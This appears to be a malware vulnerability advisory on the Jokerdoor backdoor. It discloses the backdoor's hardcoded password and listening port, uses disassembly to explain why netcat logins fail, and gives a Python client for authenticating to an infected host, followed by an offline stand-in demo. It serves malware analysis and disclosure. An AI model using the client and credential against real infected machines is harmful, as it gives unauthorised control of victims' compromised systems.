Backdoor.Win32.Jokerdoor malware suffers from a hardcoded credential vulnerability.
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/a6437375fff871dff97dc91c8fd6259f.txt
Contact: [email protected]
Vulnerability: Weak Hardcoded Credentials
Vuln ID: MVID-2022-0531
Dropped files: Random name "awup.exe"
Description: The malware listens on TCP port 27374. The password "mathiasJ" is weak and hardcoded in the PE file. Failed authentication generates a "POPUP incorrect password..." message; using TELNET results in an error "PWDPerror reading password...". Using the nc64.exe utility appends a trailing line feed character "\n" to the supplied password. This causes the cmp check to fail even when the password is correct, because the compared string still carries the "\n" character:
004BDA0C | 8B 45 EC          | mov eax,dword ptr ss:[ebp-14]   | [ebp-14]:" mathiasJ\n"
004BDA0F | 8B 15 0C AC 4D 00 | mov edx,dword ptr ds:[4DAC0C]   | 004DAC0C:&"mathiasJ"
004041C7 | 39 D0             | cmp eax,edx                     | eax:" mathiasJ\n", edx:"mathiasJ"
So we need to write a custom client that sends the password without the trailing line feed. The password must also be sent with no space and prefixed with "PWD", e.g. "PWDmathiasJ". Upon successful authentication we get a message such as "PWDconnected time, date Legends 2.1".
from socket import *
target = "127.0.0.1"  # assumption: the advisory gives no target host; replace with the infected machine
s = socket(AF_INET, SOCK_STREAM)
s.connect((target, 27374))  # port the backdoor listens on
s.send(b"PWDmathiasJ")      # "PWD" + password, no space and no trailing "\n"
res = b""
res += s.recv(512)          # e.g. "PWDconnected time, date Legends 2.1" on success
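The exchange above, as an added example that is not part of the malvuln advisory: a client that builds the "PWD" + password message with and without the trailing line feed, run against a constructed stand-in listener that mimics the backdoor's check as the advisory describes it (strip the "PWD" prefix, then compare the rest byte-for-byte against the hardcoded password). The listener, the check_password/authenticate/demo names and the exact reply bytes are assumptions modelled on the strings quoted in the advisory, not the malware's own code; the point is to show why the nc64.exe attempt fails and the custom client succeeds.

```python
import socket
import threading

PORT = 27374            # port the backdoor listens on (from the advisory)
PASSWORD = "mathiasJ"   # hardcoded password found in the PE file (from the advisory)

# Reply strings modelled on the ones quoted in the advisory; the real
# backdoor's exact formatting is not reproduced here (assumption).
OK_REPLY = b"PWDconnected time, date Legends 2.1"
BAD_REPLY = b"POPUP incorrect password..."


def build_auth(password, trailing_newline=False):
    """Build the auth message: literal 'PWD' + password, no space.

    trailing_newline reproduces what nc64.exe sends when you type the
    password and press Enter, which is what breaks the cmp in the backdoor."""
    msg = b"PWD" + password.encode()
    if trailing_newline:
        msg += b"\n"
    return msg


def check_password(msg):
    """Stand-in for the backdoor's check: strip 'PWD', then exact byte compare.

    A trailing '\\n' (or a leading space) makes this fail even with the
    right password, matching the cmp eax,edx behaviour in the advisory."""
    if not msg.startswith(b"PWD"):
        return False
    return msg[3:] == PASSWORD.encode()


def fake_backdoor(listen_sock, stop):
    """Constructed stand-in for the listener (not the malware's code)."""
    listen_sock.settimeout(0.5)
    while not stop.is_set():
        try:
            conn, _ = listen_sock.accept()
        except socket.timeout:
            continue
        except OSError:  # listening socket closed by the caller
            break
        with conn:
            data = conn.recv(512)
            conn.sendall(OK_REPLY if check_password(data) else BAD_REPLY)


def start_fake_backdoor(host="127.0.0.1", port=0):
    """Start the stand-in on an ephemeral port; returns (port, stop_event, sock)."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind((host, port))
    ls.listen(5)
    stop = threading.Event()
    threading.Thread(target=fake_backdoor, args=(ls, stop), daemon=True).start()
    return ls.getsockname()[1], stop, ls


def authenticate(host, port, password, trailing_newline=False, timeout=3.0):
    """Custom client: send the auth message and return the listener's reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_auth(password, trailing_newline))
        return s.recv(512)


def demo():
    """Run both attempts against the stand-in: nc-style (with '\\n') and custom."""
    port, stop, ls = start_fake_backdoor()
    try:
        nc_style = authenticate("127.0.0.1", port, PASSWORD, trailing_newline=True)
        custom = authenticate("127.0.0.1", port, PASSWORD)
    finally:
        stop.set()
        ls.close()
    return nc_style, custom


if __name__ == "__main__":
    nc_style, custom = demo()
    print("nc-style (trailing \\n):", nc_style)
    print("custom client        :", custom)
```

Against a real infected host you would call authenticate(host, 27374, PASSWORD) directly instead of starting the stand-in; the stand-in exists only so the failure mode can be reproduced offline.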